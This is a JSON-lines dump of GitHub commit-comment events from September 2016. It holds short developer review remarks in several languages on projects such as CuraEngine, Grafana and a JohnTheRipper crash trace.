{"id":"4630578068","type":"CommitCommentEvent","actor":{"login":"zdingding"},"repo":{"name":"zdingding/toprun"},"payload":{"comment":{"id":19207042,"position":null,"line":null,"path":null,"commit_id":"e75c9c1d783dccf2fd70bb75d48afdaaff99b1e7","created_at":"2016-09-28T13:16:13Z","updated_at":"2016-09-28T13:16:13Z","body":"git reset --hard HEAD~1"}},"created_at":"2016-09-28T13:16:13Z"}
{"id":"4630578495","type":"CommitCommentEvent","actor":{"login":"vladyan"},"repo":{"name":"vladyan/vladyan.github.io"},"payload":{"comment":{"id":19207043,"position":48,"line":48,"path":"src/less/singup.less","commit_id":"085dbc8b2810724b33eeaf019f3c39fe7f72795e","created_at":"2016-09-28T13:16:17Z","updated_at":"2016-09-28T13:16:17Z","body":"Тут тоже согласен, не думая скопипастил селекторы."}},"created_at":"2016-09-28T13:16:17Z"}
{"id":"4630580684","type":"CommitCommentEvent","actor":{"login":"eidjord"},"repo":{"name":"FINTprosjektet/informasjonsmodell"},"payload":{"comment":{"id":19207047,"position":null,"line":null,"path":null,"commit_id":"66b151b14c9dd1371eb41f21e4c51af512037ec0","created_at":"2016-09-28T13:16:42Z","updated_at":"2016-09-28T13:16:42Z","body":"xsd og uml er ikke generert(!)"}},"created_at":"2016-09-28T13:16:42Z"}
{"id":"4630585903","type":"CommitCommentEvent","actor":{"login":"awhiemstra"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19207052,"position":62,"line":73,"path":"src/utils/string.h","commit_id":"dce8a4629f811f850344acf5c322023633719761","created_at":"2016-09-28T13:17:37Z","updated_at":"2016-09-28T13:17:37Z","body":"This will overflow when writing a number with 15 or more digits, because pos is 16 at that point and the buffer is just 16 elements long."}},"created_at":"2016-09-28T13:17:37Z"}
{"id":"4630587640","type":"CommitCommentEvent","actor":{"login":"sadovnik"},"repo":{"name":"electricSemyon/vk-intersect"},"payload":{"comment":{"id":19207054,"position":19,"line":3,"path":"intersect.js","commit_id":"b2b0280669181967b64497a9da5ed5bf8af10dc6","created_at":"2016-09-28T13:17:56Z","updated_at":"2016-09-28T13:17:56Z","body":"Неудачный интерфейс. Вместо аргумента с позицией массива (k) лучше передавать рекурсивно урезанный массив через (Array.concat)[https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Array/concat]."}},"created_at":"2016-09-28T13:17:56Z"}
{"id":"4630589607","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19207056,"position":148,"line":308,"path":"src/PrimeTower.cpp","commit_id":"f7940498f0f685e5b8364b2e6a739995e8737e39","created_at":"2016-09-28T13:18:16Z","updated_at":"2016-09-28T13:18:16Z","body":"Typo: We didn't *generate* as many\r\n\r\n(Not blocking.)"}},"created_at":"2016-09-28T13:18:16Z"}
{"id":"4630590341","type":"CommitCommentEvent","actor":{"login":"vladyan"},"repo":{"name":"vladyan/vladyan.github.io"},"payload":{"comment":{"id":19207058,"position":127,"line":127,"path":"src/less/mansory.less","commit_id":"085dbc8b2810724b33eeaf019f3c39fe7f72795e","created_at":"2016-09-28T13:18:24Z","updated_at":"2016-09-28T13:18:24Z","body":"Наверно стоило сделать модификатор не для .mansory__item а для .mansory__item-content, тогда бы какскада в селекторах не было."}},"created_at":"2016-09-28T13:18:24Z"}
{"id":"4630591439","type":"CommitCommentEvent","actor":{"login":"runeguden"},"repo":{"name":"runeguden/VoreCode-BinxVersion"},"payload":{"comment":{"id":19207060,"position":null,"line":null,"path":null,"commit_id":"c57dde6158efc00b8be306513d729ac1a5240925","created_at":"2016-09-28T13:18:36Z","updated_at":"2016-09-28T13:18:36Z","body":"thinking of adding"}},"created_at":"2016-09-28T13:18:36Z"}
{"id":"4630593353","type":"CommitCommentEvent","actor":{"login":"fixitsmkll"},"repo":{"name":"dreammed/SevenKnightsAI"},"payload":{"comment":{"id":19207064,"position":null,"line":null,"path":null,"commit_id":"40d8547c346cd23ecdce9d537dd456545805c399","created_at":"2016-09-28T13:18:58Z","updated_at":"2016-09-28T13:18:58Z","body":"i download new file.\r\nIt works\r\nThank you."}},"created_at":"2016-09-28T13:18:58Z"}
{"id":"4630596822","type":"CommitCommentEvent","actor":{"login":"sadovnik"},"repo":{"name":"electricSemyon/vk-intersect"},"payload":{"comment":{"id":19207066,"position":null,"line":null,"path":null,"commit_id":"d1e55245c3c660afa7179b46985c5b13543fd896","created_at":"2016-09-28T13:19:34Z","updated_at":"2016-09-28T13:19:34Z","body":"👍"}},"created_at":"2016-09-28T13:19:34Z"}
{"id":"4630597493","type":"CommitCommentEvent","actor":{"login":"gbuddappagari"},"repo":{"name":"gbuddappagari/mnemosyne"},"payload":{"comment":{"id":19207068,"position":12,"line":13,"path":"src/addMACData.js","commit_id":"579c3810953cb451da3e8fb4becb0daafcff4bc3","created_at":"2016-09-28T13:19:42Z","updated_at":"2016-09-28T13:19:42Z","body":"Encrypt SECRET_KEY using travis-ci and add it as environmental variable to .travis.yml "}},"created_at":"2016-09-28T13:19:42Z"}
{"id":"4630597982","type":"CommitCommentEvent","actor":{"login":"mtanda"},"repo":{"name":"grafana/grafana"},"payload":{"comment":{"id":19207069,"position":33,"line":73,"path":"public/app/plugins/datasource/prometheus/datasource.ts","commit_id":"add9e7e3a03ad519156758a8e63944db0516586d","created_at":"2016-09-28T13:19:46Z","updated_at":"2016-09-28T13:19:46Z","body":"I want to mix in adhoc variables into scoped variables to use adhoc filter in Prometheus query language (PromQL).\r\nThe PromQL need to placeholder where adhoc variable is expanded.\r\n\r\nI look InfluxDB code, it only add \"WHERE AND\" clause.\r\nBut, the PromQL has filter part for each metric.\r\nlike this \"count(go_goroutines{job=\"foo\"}) by (instance)\".\r\nThe 'job=\"foo\"' is filter part.\r\n\r\nTo automatically add the adhoc filter variable, the query should like following.\r\n\"count(go_goroutines{$adhoc_var}) by (instance)\"\r\n\r\nI render adhoc filter in datasource plugin, and mix the result in scoped variable. It works like normal template variable, and I get correct query."}},"created_at":"2016-09-28T13:19:46Z"}
{"id":"4630599755","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19207070,"position":null,"line":null,"path":null,"commit_id":"e5ab0940f7fc1ced4c80848c91ee0b356ce8afee","created_at":"2016-09-28T13:20:06Z","updated_at":"2016-09-28T13:20:06Z","body":"license-update (macumber) - i386-Windows-7-VisualStudio-12: Tests Failed (2172 of 2448 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-e5ab0940f7fc1ced4c80848c91ee0b356ce8afee-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-e5ab0940f7fc1ced4c80848c91ee0b356ce8afee-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-88.73%25-red.svg)</a> \n"}},"created_at":"2016-09-28T13:20:06Z"}
{"id":"4630600485","type":"CommitCommentEvent","actor":{"login":"Unified-Dev"},"repo":{"name":"Unified-Dev/findir"},"payload":{"comment":{"id":19207071,"position":1,"line":1,"path":"CNAME","commit_id":"353a2a1bd198fc55d7fc6b9434dc8121d11f3954","created_at":"2016-09-28T13:20:14Z","updated_at":"2016-09-28T13:20:14Z","body":"pop"}},"created_at":"2016-09-28T13:20:14Z"}
{"id":"4630601481","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19207073,"position":15,"line":55,"path":"src/utils/polygonUtils.cpp","commit_id":"433c90617e72cc5e56586fe8d7df9958e9b94c72","created_at":"2016-09-28T13:20:24Z","updated_at":"2016-09-28T13:20:24Z","body":"You're normalizing this return vector every time you use this function. It makes some sense to always return a normalised-vector instead."}},"created_at":"2016-09-28T13:20:24Z"}
{"id":"4630602010","type":"CommitCommentEvent","actor":{"login":"PhilippSpo"},"repo":{"name":"sphereio/sphere-node-sdk"},"payload":{"comment":{"id":19207074,"position":null,"line":null,"path":null,"commit_id":"0b515df057f8a25934e4566020d2913158b4017b","created_at":"2016-09-28T13:20:30Z","updated_at":"2016-09-28T13:20:30Z","body":"👍 "}},"created_at":"2016-09-28T13:20:30Z"}
{"id":"4630605202","type":"CommitCommentEvent","actor":{"login":"rmdort"},"repo":{"name":"gunthercox/ChatterBot"},"payload":{"comment":{"id":19207078,"position":null,"line":null,"path":null,"commit_id":"5a49cf49f5df2e7ecd63a09bd1dd3072342e0db0","created_at":"2016-09-28T13:21:03Z","updated_at":"2016-09-28T13:21:03Z","body":"Can this be merged to master?"}},"created_at":"2016-09-28T13:21:03Z"}
{"id":"4630607477","type":"CommitCommentEvent","actor":{"login":"iNPUTmice"},"repo":{"name":"siacs/Conversations"},"payload":{"comment":{"id":19207082,"position":null,"line":null,"path":null,"commit_id":"b0fb9fd9ee7ae8a9dc08159dcd4a718e08dcb314","created_at":"2016-09-28T13:21:21Z","updated_at":"2016-09-28T13:21:21Z","body":"You can if it makes sense in the language. Ie if the words room or nick are not commonly used."}},"created_at":"2016-09-28T13:21:21Z"}
{"id":"4630609036","type":"CommitCommentEvent","actor":{"login":"steida"},"repo":{"name":"este/este"},"payload":{"comment":{"id":19207084,"position":20,"line":20,"path":"src/common/lib/redux-firebase/firebase.js","commit_id":"55124e22f1148886721ee95689aece95965cdf68","created_at":"2016-09-28T13:21:37Z","updated_at":"2016-09-28T13:21:37Z","body":"Yeah, I will happily replace Firebase with anything else based on Relay ad GraphQL once it will be production ready. Feel free to open issue in Este anytime.\r\n\r\n"}},"created_at":"2016-09-28T13:21:37Z"}
{"id":"4630609373","type":"CommitCommentEvent","actor":{"login":"rmdort"},"repo":{"name":"gunthercox/ChatterBot"},"payload":{"comment":{"id":19207086,"position":null,"line":null,"path":null,"commit_id":"e0508f84268014653588dcbdd3ee22b341178012","created_at":"2016-09-28T13:21:41Z","updated_at":"2016-09-28T13:21:41Z","body":"Awesome. Sentiment adapter is going to be really helpful. Merge to master?"}},"created_at":"2016-09-28T13:21:41Z"}
{"id":"4630609594","type":"CommitCommentEvent","actor":{"login":"ademaro"},"repo":{"name":"blackio/hazy-shade"},"payload":{"comment":{"id":19207087,"position":17,"line":17,"path":"build/index.html","commit_id":"bcf452b1abb96bd0c788a285f2b0b0a54c04fcba","created_at":"2016-09-28T13:21:43Z","updated_at":"2016-09-28T13:21:43Z","body":"зачем обёртка `header__logo`?"}},"created_at":"2016-09-28T13:21:43Z"}
{"id":"4630610009","type":"CommitCommentEvent","actor":{"login":"torkelo"},"repo":{"name":"grafana/grafana"},"payload":{"comment":{"id":19207089,"position":33,"line":73,"path":"public/app/plugins/datasource/prometheus/datasource.ts","commit_id":"add9e7e3a03ad519156758a8e63944db0516586d","created_at":"2016-09-28T13:21:47Z","updated_at":"2016-09-28T13:21:47Z","body":"Is there a safe way to find the first `{` and automatically insert the rendered ad hoc filters?"}},"created_at":"2016-09-28T13:21:47Z"}
{"id":"4630610090","type":"CommitCommentEvent","actor":{"login":"vladyan"},"repo":{"name":"vladyan/vladyan.github.io"},"payload":{"comment":{"id":19207090,"position":540,"line":540,"path":"dist/main.css","commit_id":"085dbc8b2810724b33eeaf019f3c39fe7f72795e","created_at":"2016-09-28T13:21:48Z","updated_at":"2016-09-28T13:21:48Z","body":"Можно было двойным обойтись, ни чего не ломая. Зачем сделал твойной хз("}},"created_at":"2016-09-28T13:21:48Z"}
{"id":"4630610175","type":"CommitCommentEvent","actor":{"login":"dalisoft"},"repo":{"name":"jonobr1/equalizer"},"payload":{"comment":{"id":19207091,"position":null,"line":null,"path":null,"commit_id":"6653efd98d7ef0331eab3bd274398661b0e72a58","created_at":"2016-09-28T13:21:49Z","updated_at":"2016-09-28T13:21:49Z","body":"Thanks, exactly that what i'm looking for. I'm just in few days thinking about that, very nice app"}},"created_at":"2016-09-28T13:21:49Z"}
{"id":"4630611310","type":"CommitCommentEvent","actor":{"login":"ademaro"},"repo":{"name":"blackio/hazy-shade"},"payload":{"comment":{"id":19207093,"position":20,"line":20,"path":"build/index.html","commit_id":"bcf452b1abb96bd0c788a285f2b0b0a54c04fcba","created_at":"2016-09-28T13:22:01Z","updated_at":"2016-09-28T13:22:01Z","body":"отступы"}},"created_at":"2016-09-28T13:22:01Z"}
{"id":"4630612343","type":"CommitCommentEvent","actor":{"login":"SebastianJay"},"repo":{"name":"SebastianJay/Wilderness"},"payload":{"comment":{"id":19207096,"position":74,"line":31,"path":"src/window_draw.py","commit_id":"eab1ee2134ca94cac4e349f71fa5c3dff54a6054","created_at":"2016-09-28T13:22:12Z","updated_at":"2016-09-28T13:22:12Z","body":"start is unused"}},"created_at":"2016-09-28T13:22:12Z"}
{"id":"4630613025","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19207099,"position":14,"line":54,"path":"src/utils/polygonUtils.cpp","commit_id":"433c90617e72cc5e56586fe8d7df9958e9b94c72","created_at":"2016-09-28T13:22:18Z","updated_at":"2016-09-28T13:22:18Z","body":"You don't know if this rotated normal vector is still inside the prime tower."}},"created_at":"2016-09-28T13:22:18Z"}
{"id":"4630614254","type":"CommitCommentEvent","actor":{"login":"lukas-h"},"repo":{"name":"tosinonikute/tosinonikute.github.io"},"payload":{"comment":{"id":19207108,"position":null,"line":null,"path":null,"commit_id":"dd902ac54649ef9d24b5451e54496c1b02d5ee3d","created_at":"2016-09-28T13:22:31Z","updated_at":"2016-09-28T13:22:31Z","body":"Not only you forgot to do that :laughing: I forgot to describe it in the README & article - my mistake"}},"created_at":"2016-09-28T13:22:31Z"}
{"id":"4630614681","type":"CommitCommentEvent","actor":{"login":"ademaro"},"repo":{"name":"blackio/hazy-shade"},"payload":{"comment":{"id":19207110,"position":18,"line":18,"path":"build/index.html","commit_id":"bcf452b1abb96bd0c788a285f2b0b0a54c04fcba","created_at":"2016-09-28T13:22:36Z","updated_at":"2016-09-28T13:22:36Z","body":"миксование на уровне препроцессоров, а не в разметке хотелось бы видеть изначально"}},"created_at":"2016-09-28T13:22:36Z"}
{"id":"4630614790","type":"CommitCommentEvent","actor":{"login":"pranayaryal"},"repo":{"name":"pranayaryal/stanford-cs231"},"payload":{"comment":{"id":19207111,"position":null,"line":null,"path":null,"commit_id":"6fefd751116a627086464f44a1310d3d65899577","created_at":"2016-09-28T13:22:37Z","updated_at":"2016-09-28T13:22:37Z","body":"Add pranay solutions folder"}},"created_at":"2016-09-28T13:22:37Z"}
{"id":"4630615032","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19207112,"position":null,"line":null,"path":null,"commit_id":"459ecde30eb679c977d7124813fccb99b5442f6a","created_at":"2016-09-28T13:22:40Z","updated_at":"2016-09-28T13:22:40Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1189](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14467&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 260, ignored: 3 Build time: 00:13:58"}},"created_at":"2016-09-28T13:22:40Z"}
{"id":"4630616074","type":"CommitCommentEvent","actor":{"login":"kaspermarstal"},"repo":{"name":"kaspermarstal/SuperElastix"},"payload":{"comment":{"id":19207116,"position":null,"line":null,"path":null,"commit_id":"42478b0cf10b2bf64e96b204a8cd507d5669a1d8","created_at":"2016-09-28T13:22:50Z","updated_at":"2016-09-28T13:22:50Z","body":"This has now been renamed to superelastix.exe and moved to an Applications folder"}},"created_at":"2016-09-28T13:22:50Z"}
{"id":"4630618368","type":"CommitCommentEvent","actor":{"login":"ademaro"},"repo":{"name":"blackio/hazy-shade"},"payload":{"comment":{"id":19207119,"position":30,"line":30,"path":"build/index.html","commit_id":"bcf452b1abb96bd0c788a285f2b0b0a54c04fcba","created_at":"2016-09-28T13:23:14Z","updated_at":"2016-09-28T13:23:14Z","body":"декоративное изображение вставлено как контентное"}},"created_at":"2016-09-28T13:23:14Z"}
{"id":"4630619146","type":"CommitCommentEvent","actor":{"login":"isaaorozco"},"repo":{"name":"isaaorozco/Algoritmo_PEPS"},"payload":{"comment":{"id":19207123,"position":null,"line":null,"path":null,"commit_id":"058973145f5503c52142877437cae9c65a000574","created_at":"2016-09-28T13:23:23Z","updated_at":"2016-09-28T13:23:23Z","body":"\r\n[PEPS.txt](https://github.com/isaaorozco/Algoritmo_PEPS/files/498122/PEPS.txt)\r\n"}},"created_at":"2016-09-28T13:23:23Z"}
{"id":"4630619787","type":"CommitCommentEvent","actor":{"login":"ademaro"},"repo":{"name":"blackio/hazy-shade"},"payload":{"comment":{"id":19207128,"position":30,"line":30,"path":"build/index.html","commit_id":"bcf452b1abb96bd0c788a285f2b0b0a54c04fcba","created_at":"2016-09-28T13:23:30Z","updated_at":"2016-09-28T13:23:30Z","body":"лишний див, лишний спан"}},"created_at":"2016-09-28T13:23:30Z"}
{"id":"4630621292","type":"CommitCommentEvent","actor":{"login":"blakejohnson"},"repo":{"name":"BBN-Q/APS2-Comms"},"payload":{"comment":{"id":19207131,"position":null,"line":null,"path":null,"commit_id":"8d5424abaa03062c6b255e3acda7fa59c418b5ff","created_at":"2016-09-28T13:23:46Z","updated_at":"2016-09-28T13:23:46Z","body":"The ComBlocks \"patch\" seems to be the entire top-level file. Is this a line-ending problem or something?"}},"created_at":"2016-09-28T13:23:46Z"}
{"id":"4630622161","type":"CommitCommentEvent","actor":{"login":"claudioandre"},"repo":{"name":"magnumripper/JohnTheRipper"},"payload":{"comment":{"id":19207134,"position":null,"line":null,"path":null,"commit_id":"7b47e453b4207fd758a2e2d2f5c642c15a8f32a6","created_at":"2016-09-28T13:23:56Z","updated_at":"2016-09-28T13:23:56Z","body":"It is failing inside AMD software (clang only). I will try to see if I can reproduce this on super.\r\n\r\n```\r\n    ASAN:SIGSEGV\r\n=================================================================\r\n==13345==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x0000004621f5 bp 0x000000000001 sp 0x7ffea7f87280 T0)\r\n    #0 0x4621f4 in __asan::Deallocate(void*, __sanitizer::StackTrace*, __asan::AllocType) /home/ben/development/llvm/3.5/final/llvm.src/projects/compiler-rt/lib/asan/asan_allocator2.cc:473:3\r\n    #1 0x4c7a3c in free /home/ben/development/llvm/3.5/final/llvm.src/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:31:3\r\n    #2 0x7f64f281046c (/usr/lib/libatiadlxx.so+0x2146c)\r\n    #3 0x7f64f2824bd4 in ADL2_Main_Control_Destroy (/usr/lib/libatiadlxx.so+0x35bd4)\r\n    #4 0x7f64e62cf182 (/usr/lib/libamdocl64.so+0x679182)\r\n    #5 0x7f64e62cf2fb (/usr/lib/libamdocl64.so+0x6792fb)\r\n    #6 0x7f64e62cf723 (/usr/lib/libamdocl64.so+0x679723)\r\n    #7 0x7f64e62d1d7a (/usr/lib/libamdocl64.so+0x67bd7a)\r\n    #8 0x7f64e62ebe16 (/usr/lib/libamdocl64.so+0x695e16)\r\n    #9 0x7f64e62bc992 in clIcdGetPlatformIDsKHR (/usr/lib/libamdocl64.so+0x666992)\r\n    #10 0x7f64f426b6ed (/usr/lib/libOpenCL.so.1+0x26ed)\r\n    #11 0x7f64f426d536 (/usr/lib/libOpenCL.so.1+0x4536)\r\n    #12 0x7f64f34eca7f in __GI___pthread_once (/lib/x86_64-linux-gnu/libpthread.so.0+0xda7f)\r\n    #13 0x7f64f426d5c6 (/usr/lib/libOpenCL.so.1+0x45c6)\r\n    #14 0x7f64f426b684 (/usr/lib/libOpenCL.so.1+0x2684)\r\n    #15 0x7f64f426bc80 in clGetPlatformIDs (/usr/lib/libOpenCL.so.1+0x2c80)\r\n    #16 0xabee7e in start_opencl_environment /home/travis/build/claudioandre/JohnTheRipper/src/common-opencl.c:428:2\r\n    #17 0xab07cc in opencl_preinit /home/travis/build/claudioandre/JohnTheRipper/src/common-opencl.c:696:3\r\n    #18 0xab914d in opencl_prepare_dev /home/travis/build/claudioandre/JohnTheRipper/src/common-opencl.c:2030:2\r\n    #19 0x907eee in init /home/travis/build/claudioandre/JohnTheRipper/src/opencl_sha1crypt_fmt_plug.c:160:2\r\n    #20 0xa1072e in fmt_init /home/travis/build/claudioandre/JohnTheRipper/src/formats.c:83:3\r\n    #21 0x9f8ee7 in benchmark_all /home/travis/build/claudioandre/JohnTheRipper/src/bench.c:712:4\r\n    #22 0xa22bd5 in john_run /home/travis/build/claudioandre/JohnTheRipper/src/john.c:1595:17\r\n    #23 0xa1ffee in main /home/travis/build/claudioandre/JohnTheRipper/src/john.c:1980:2\r\n    #24 0x7f64f2d1df44 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21f44)\r\n    #25 0x4e527c in _start (/home/travis/build/claudioandre/JohnTheRipper/run/john+0x4e527c)\r\n```"}},"created_at":"2016-09-28T13:23:56Z"}
{"id":"4630623614","type":"CommitCommentEvent","actor":{"login":"ademaro"},"repo":{"name":"blackio/hazy-shade"},"payload":{"comment":{"id":19207138,"position":43,"line":43,"path":"build/index.html","commit_id":"bcf452b1abb96bd0c788a285f2b0b0a54c04fcba","created_at":"2016-09-28T13:24:11Z","updated_at":"2016-09-28T13:24:11Z","body":"зачем столько обёрток лишних?"}},"created_at":"2016-09-28T13:24:11Z"}
{"id":"4630631576","type":"CommitCommentEvent","actor":{"login":"bonii-xx"},"repo":{"name":"SlimeKnights/TinkersConstruct"},"payload":{"comment":{"id":19207160,"position":null,"line":null,"path":null,"commit_id":"a470839ceb1b30f8f06bef4ba556eba0cba7ed3c","created_at":"2016-09-28T13:25:33Z","updated_at":"2016-09-28T13:25:33Z","body":"According to the issue shovels worked.. but we should probably check nontheless"}},"created_at":"2016-09-28T13:25:33Z"}
{"id":"4630631880","type":"CommitCommentEvent","actor":{"login":"Signmark"},"repo":{"name":"Signmark/ATMTA-Station"},"payload":{"comment":{"id":19207163,"position":5,"line":27,"path":"code/modules/food_and_drinks/drinks/drinks/bottle.dm","commit_id":"2f830afe960aac452e482a3eb4c26a4c084a609c","created_at":"2016-09-28T13:25:36Z","updated_at":"2016-09-28T13:25:36Z","body":":+1: "}},"created_at":"2016-09-28T13:25:36Z"}
{"id":"4630632718","type":"CommitCommentEvent","actor":{"login":"bonii-xx"},"repo":{"name":"SlimeKnights/TinkersConstruct"},"payload":{"comment":{"id":19207165,"position":null,"line":null,"path":null,"commit_id":"a470839ceb1b30f8f06bef4ba556eba0cba7ed3c","created_at":"2016-09-28T13:25:44Z","updated_at":"2016-09-28T13:25:44Z","body":"Btw, are you gonna be on IRC soon?"}},"created_at":"2016-09-28T13:25:44Z"}
{"id":"4630632823","type":"CommitCommentEvent","actor":{"login":"ademaro"},"repo":{"name":"blackio/hazy-shade"},"payload":{"comment":{"id":19207166,"position":81,"line":81,"path":"build/index.html","commit_id":"bcf452b1abb96bd0c788a285f2b0b0a54c04fcba","created_at":"2016-09-28T13:25:45Z","updated_at":"2016-09-28T13:25:45Z","body":"у нас БЭМ или нет? откуда аж 3 блока в одном теге?"}},"created_at":"2016-09-28T13:25:45Z"}
{"id":"4630637192","type":"CommitCommentEvent","actor":{"login":"Signmark"},"repo":{"name":"Signmark/ATMTA-Station"},"payload":{"comment":{"id":19207176,"position":34,"line":34,"path":"hyntatmta/code/game/machinery/kitchen/glass_recycler.dm","commit_id":"2f830afe960aac452e482a3eb4c26a4c084a609c","created_at":"2016-09-28T13:26:31Z","updated_at":"2016-09-28T13:26:31Z","body":"Пометка для себя: переделать под наноуи"}},"created_at":"2016-09-28T13:26:31Z"}
{"id":"4630638003","type":"CommitCommentEvent","actor":{"login":"shainer"},"repo":{"name":"calamares/calamares"},"payload":{"comment":{"id":19207177,"position":null,"line":null,"path":null,"commit_id":"fc8e29bf35680cdd96a21f636f9b5be3b78038a7","created_at":"2016-09-28T13:26:39Z","updated_at":"2016-09-28T13:26:39Z","body":"You mean giving the possibility of the selecting the login shell of a new user, and then displaying that in the main view? If that is what you meant, yes, I will make a note of that."}},"created_at":"2016-09-28T13:26:39Z"}
{"id":"4630639948","type":"CommitCommentEvent","actor":{"login":"Signmark"},"repo":{"name":"Signmark/ATMTA-Station"},"payload":{"comment":{"id":19207183,"position":2,"line":2,"path":"hyntatmta/code/game/machinery/procs.dm","commit_id":"2f830afe960aac452e482a3eb4c26a4c084a609c","created_at":"2016-09-28T13:26:59Z","updated_at":"2016-09-28T13:26:59Z","body":"что это за хуйня"}},"created_at":"2016-09-28T13:26:59Z"}
{"id":"4630643691","type":"CommitCommentEvent","actor":{"login":"yitznewton"},"repo":{"name":"yitznewton/bloom-filter"},"payload":{"comment":{"id":19207188,"position":14,"line":19,"path":"lib/bloom_filter.rb","commit_id":"9ce0c5ba53cdaf686f99f9a631c52a1bc8d70c23","created_at":"2016-09-28T13:27:40Z","updated_at":"2016-09-28T13:27:40Z","body":"Should probably use `#reduce` here instead of the early return"}},"created_at":"2016-09-28T13:27:40Z"}
{"id":"4630645952","type":"CommitCommentEvent","actor":{"login":"tosinonikute"},"repo":{"name":"tosinonikute/tosinonikute.github.io"},"payload":{"comment":{"id":19207193,"position":null,"line":null,"path":null,"commit_id":"dd902ac54649ef9d24b5451e54496c1b02d5ee3d","created_at":"2016-09-28T13:28:03Z","updated_at":"2016-09-28T13:28:03Z","body":":+1: "}},"created_at":"2016-09-28T13:28:03Z"}
{"id":"4630646079","type":"CommitCommentEvent","actor":{"login":"Zayelion"},"repo":{"name":"Fluorohydride/ygopro-pre-script"},"payload":{"comment":{"id":19207194,"position":null,"line":null,"path":null,"commit_id":"22fc413805597b67c14483b70f98a00d30c1f4c9","created_at":"2016-09-28T13:28:04Z","updated_at":"2016-09-28T13:28:04Z","body":":heart: "}},"created_at":"2016-09-28T13:28:04Z"}
{"id":"4630646605","type":"CommitCommentEvent","actor":{"login":"uaandrei"},"repo":{"name":"uaandrei/d4232ffg"},"payload":{"comment":{"id":19207197,"position":null,"line":null,"path":null,"commit_id":"52a4d0c204a294c607aa04c4a18f26a8d2605cce","created_at":"2016-09-28T13:28:11Z","updated_at":"2016-09-28T13:28:11Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Create domain model, repository, domain model validator for Activity](https://trello.com/c/LBCSCKtp/9-create-domain-model-repository-domain-model-validator-for-activity)"}},"created_at":"2016-09-28T13:28:11Z"}
{"id":"4630650513","type":"CommitCommentEvent","actor":{"login":"dingqz"},"repo":{"name":"dingqz/Java"},"payload":{"comment":{"id":19207207,"position":null,"line":null,"path":null,"commit_id":"c0252763a0803522689fdb971bfb29aa7f7334a2","created_at":"2016-09-28T13:28:50Z","updated_at":"2016-09-28T13:28:50Z","body":"class BaseClass\r\n{\r\n       public int a = 5;\r\n}\r\nclass SubClass extends BaseClass\r\n{\r\n       public int a = 7;\r\n       public void accessOwner()\r\n      {\r\n            System. out.println(a );\r\n      }\r\n       public void accessBase()\r\n      {\r\n             //通过super来访问方法调用者对应的父类对象\r\n            System. out.println(super.a);\r\n      }\r\n       public static void main(String[] args)\r\n      {\r\n            SubClass sc = new SubClass();\r\n             //直接访问SubClass对象的a属性将会输出7\r\n            System. out.println(sc.a );\r\n             //输出7\r\n            sc.accessOwner();\r\n             //输出5\r\n            sc.accessBase();\r\n      }\r\n}\r\n\r\n7\r\n7\r\n5"}},"created_at":"2016-09-28T13:28:50Z"}
{"id":"4630651042","type":"CommitCommentEvent","actor":{"login":"udeved"},"repo":{"name":"calamares/calamares"},"payload":{"comment":{"id":19207210,"position":null,"line":null,"path":null,"commit_id":"fc8e29bf35680cdd96a21f636f9b5be3b78038a7","created_at":"2016-09-28T13:28:56Z","updated_at":"2016-09-28T13:28:56Z","body":"Great, yes, that's what I meant. So it'd be possible to install a system with eg zsh login shell."}},"created_at":"2016-09-28T13:28:56Z"}
{"id":"4630651070","type":"CommitCommentEvent","actor":{"login":"Signmark"},"repo":{"name":"Signmark/ATMTA-Station"},"payload":{"comment":{"id":19207211,"position":4,"line":16,"path":"code/modules/food_and_drinks/drinks/drinks/drinkingglass.dm","commit_id":"2f830afe960aac452e482a3eb4c26a4c084a609c","created_at":"2016-09-28T13:28:56Z","updated_at":"2016-09-28T13:28:56Z","body":"В гайдлайнах указано - абсолютные пути функций вместо относительных."}},"created_at":"2016-09-28T13:28:56Z"}
{"id":"4630653107","type":"CommitCommentEvent","actor":{"login":"ademaro"},"repo":{"name":"blackio/hazy-shade"},"payload":{"comment":{"id":19207213,"position":2,"line":2,"path":"src/page/footer/footer__social.pug","commit_id":"bcf452b1abb96bd0c788a285f2b0b0a54c04fcba","created_at":"2016-09-28T13:29:17Z","updated_at":"2016-09-28T13:29:17Z","body":"footer__social-link-twitter элемент вместо модификатора"}},"created_at":"2016-09-28T13:29:17Z"}
{"id":"4630653467","type":"CommitCommentEvent","actor":{"login":"vladyan"},"repo":{"name":"vladyan/vladyan.github.io"},"payload":{"comment":{"id":19207214,"position":10,"line":10,"path":"src/less/inspirations.less","commit_id":"085dbc8b2810724b33eeaf019f3c39fe7f72795e","created_at":"2016-09-28T13:29:21Z","updated_at":"2016-09-28T13:29:21Z","body":"Кнопки генерируются скриптом, вложенность чтобы глобальными стили для этих кнопок не делать. На случай если в другом месте на страницах будет слайдер с изменеными кнопками. Т.е. чтобы не нужно было бы переопределять стили потом, а просто задать как есть. В документации к библиотеке не нашел, как свои селекторы задать для кажого экземпляра класса..."}},"created_at":"2016-09-28T13:29:21Z"}
